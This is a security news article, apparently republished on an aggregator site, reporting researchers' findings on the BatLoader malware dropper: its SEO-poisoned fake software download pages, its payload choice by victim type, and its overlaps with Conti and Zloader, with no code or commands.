Researchers Sound Alarm on Dangerous BatLoader Malware Dropper

BatLoader has spread rapidly to roost in systems globally, tailoring payloads to its victims.

A dangerous new malware loader with features for determining whether its on a business system or a personal computer has begun rapidly infecting systems worldwide over the past few months.
Researchers at VMware Carbon Black are tracking the threat, dubbed BatLoader, and say its operators are using the dropper to distribute a variety of malware tools including a banking Trojan, an information stealer, and the Cobalt Strike post-exploit toolkit on victim systems. The threat actors tactic has been to host the malware on compromised websites and lure users to those sites using search engine optimization (SEO) poisoning methods.
BatLoader relies heavily on batch and PowerShell scripts to gain an initial foothold on a victim machine and to download other malware onto it. This has made the campaign
hard to detect and block
, especially in the early stages, analysts from VMware Carbon Blacks managed detection and response (MDR) team said in a report released on Nov. 14.
VMware said its Carbon Black MDR team had observed 43 successful infections in the last 90 days, in addition to numerous other unsuccessful attempts where a victim downloaded the initial infection file but did not execute it. Nine of the victims were organizations in the business services sector, seven were financial services companies, and five were in manufacturing. Other victims included organizations in the education, retail, IT, and healthcare sectors.
On Nov. 9, eSentire said its threat-hunting team had observed BatLoaders operator luring victims to websites masquerading as download pages for popular business software such as LogMeIn, Zoom, TeamViewer, and AnyDesk. The threat actor distributed links to these websites
via ads that showed up prominently in search engine results
when users searched for any of these software products.
The security vendor said that in one late October incident, an eSentire customer arrived at a fake LogMeIn download page and downloaded a Windows installer that, among other things, profiles the system and uses the information to retrieve a second-stage payload.
What makes BatLoader interesting is that it has logic built into it that determines if the victim computer is a personal computer or a corporate computer, says Keegan Keplinger, research and reporting lead with eSentire’s TRU research team. It then drops the type of malware appropriate for the situation.
For example, if BatLoader hits a personal computer, it downloads Ursnif banking malware and the Vidar information stealer. If it hits a domain-joined or corporate computer, it downloads Cobalt Strike and the Syncro remote monitoring and management tool, in addition to the banking Trojan and information stealer.
If BatLoader lands on a personal computer, it will proceed with fraud, infostealing, and banking-based payloads like Ursnif, Keegan says. If BatLoader detects that its in an organizational environment, it will proceed with intrusion tools like Cobalt Strike and Syncro.
Keegan says eSentire has observed a lot of recent cyberattacks involving BatLoader. Most of the attacks are opportunistic and hit anyone looking for trusted and popular free software tools.
To get in front of organizations, BatLoader leverages poisoned ads so that when employees look for trusted free software, like LogMeIn and Zoom, they instead land on sites controlled by attackers, delivering BatLoader.
VMware Carbon Black said that while there are several aspects of the BatLoader campaign that are unique, there are also several attributes of the attack chain that have a resemblance with the
Conti ransomware operation
.
The overlaps include an IP address that the Conti group used in a campaign leveraging the Log4j vulnerability, and the use of a remote management tool called Atera that Conti has used in previous operations.
In addition to the similarities with Conti, BatLoader also has several overlaps with
Zloader, a banking Trojan
that appears derived from the Zeus banking Trojan of the early 2000s, the security vendor said. The biggest similarities there include the use of SEO poisoning to lure victims to malware-laden websites, the use of Windows Installer for establishing an initial foothold and the use of PowerShell, batch scripts, and other native OS binaries during the attack chain.
Mandiant was the first to report on BatLoader. In a blog post in February, the security vendor reported observing a threat actor using free productivity apps installation and free software development tools installation themes as SEO keywords to lure users to download sites.
This initial BatLoader compromise was the
beginning of a multi-stage infection chain
that provides the attackers with a foothold inside the target organization, Mandiant said. The attackers used every stage to set up the next phase of the attack chain using tools such as PowerShell, Msiexec.exe, and Mshta.exe to evade detection.

Last News
▸ ArcSight prepares for future at user conference post HP acquisition. ◂ Discovered: 07/01/2025 Category: security	▸ Samsung Epic 4G: First To Use Media Hub ◂ Discovered: 07/01/2025 Category: security	▸ Many third-party software fails security tests ◂ Discovered: 07/01/2025 Category: security

**Cyber Security Categories**
Google Dorks Database	Exploits Vulnerability	Exploit Shellcodes

CVE List

Tools/Apps

News/Aarticles

Phishing Database

Deepfake Detection

Trends/Statistics & Live Infos

Tags:
Researchers Sound Alarm on Dangerous BatLoader Malware Dropper